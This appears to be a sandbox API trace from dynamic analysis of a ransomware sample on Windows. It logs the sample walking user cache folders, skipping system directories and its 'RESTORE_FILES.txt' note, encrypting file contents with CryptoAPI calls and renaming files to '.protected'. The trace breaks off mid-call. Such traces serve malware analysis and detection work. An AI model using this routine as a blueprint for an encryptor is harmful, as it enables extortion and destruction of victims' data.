[0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="$Recycle.bin") returned 1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="System Volume Information") returned -1 [0088.228] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.228] StrStrIW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".protected") returned 0x0 [0088.228] lstrcmpW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="RESTORE_FILES.txt") returned -1 [0088.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.229] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".txt") returned 0x0 [0088.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.229] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".rar") returned 0x0 [0088.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.229] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".zip") returned 0x0 [0088.229] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x22a, lpOverlapped=0x0) returned 1 [0088.230] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.230] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x22a, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x22a, lpOverlapped=0x0) returned 1 [0088.230] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.230] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.230] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.230] CloseHandle (hObject=0x150) returned 1 [0088.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected") returned 128 [0088.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21.protected")) returned 1 [0088.231] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Windows") returned -1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files") returned -1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files (x86)") returned -1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="$Recycle.bin") returned 1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="System Volume Information") returned -1 [0088.231] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.231] StrStrIW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".protected") returned 0x0 [0088.231] lstrcmpW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="RESTORE_FILES.txt") returned -1 [0088.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.232] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".txt") returned 0x0 [0088.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.233] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".rar") returned 0x0 [0088.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.233] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".zip") returned 0x0 [0088.233] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.233] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.233] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.234] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.234] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.234] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.234] CloseHandle (hObject=0x150) returned 1 [0088.234] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected") returned 161 [0088.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.protected")) returned 1 [0088.235] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0088.235] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.235] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0088.235] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0088.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.236] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0088.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.236] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0088.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.237] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0088.237] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1fa, lpOverlapped=0x0) returned 1 [0088.237] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.237] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1fa, lpOverlapped=0x0) returned 1 [0088.238] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.238] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.238] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.238] CloseHandle (hObject=0x150) returned 1 [0088.238] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 128 [0088.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0088.239] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.239] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Windows") returned -1 [0088.239] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files") returned -1 [0088.239] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files (x86)") returned -1 [0088.240] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="$Recycle.bin") returned 1 [0088.240] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="System Volume Information") returned -1 [0088.240] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrIW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".protected") returned 0x0 [0088.240] lstrcmpW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="RESTORE_FILES.txt") returned -1 [0088.240] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.240] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".txt") returned 0x0 [0088.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".rar") returned 0x0 [0088.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".zip") returned 0x0 [0088.240] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x67c, lpOverlapped=0x0) returned 1 [0088.303] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff984, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.303] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x67c, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x67c, lpOverlapped=0x0) returned 1 [0088.303] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.303] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.304] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.304] CloseHandle (hObject=0x150) returned 1 [0088.304] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected") returned 161 [0088.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.protected")) returned 1 [0088.305] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Windows") returned -1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files") returned -1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files (x86)") returned -1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="$Recycle.bin") returned 1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="System Volume Information") returned -1 [0088.305] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.305] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".protected") returned 0x0 [0088.305] lstrcmpW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="RESTORE_FILES.txt") returned -1 [0088.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.307] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".txt") returned 0x0 [0088.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.307] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".rar") returned 0x0 [0088.307] lstrlenW 